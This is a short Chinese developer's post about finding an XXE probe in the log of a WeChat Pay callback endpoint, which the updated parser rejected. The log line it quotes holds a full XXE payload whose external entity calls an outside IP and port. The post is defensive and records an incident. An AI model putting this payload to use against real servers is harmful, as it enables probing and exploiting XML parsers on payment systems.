早上检查系统日志,发现有很多打印
2019-04-08 03:15:34 [ http-bio-8080-exec-149:384527931 ] - [ WARN ] Invalid XML, can not convert to map. Error message: DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.. XML content: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019040803_63?aHR0cDovL3d3dy5oYW5namlhbmV0LmNvbS93eHBheS9ub3RpZnk=">%xxe;]>
由于这个打印是在微信支付回调接口出现的,所以就引起了我的注意,看这个样子是有人要搞事情啊。
然后看到xxe这个有点熟悉,就想起前段时间微信的支付漏洞,要提示更新什么的,看看这篇文章:微信XXE漏洞
还好之前收到通知更新了sdk的。
如果要验证自己的微信支付是否存在这个问题,可以自己写一个入侵xxe的测试代码,或者去微信商户平台,然后在:产品中心-》安全医生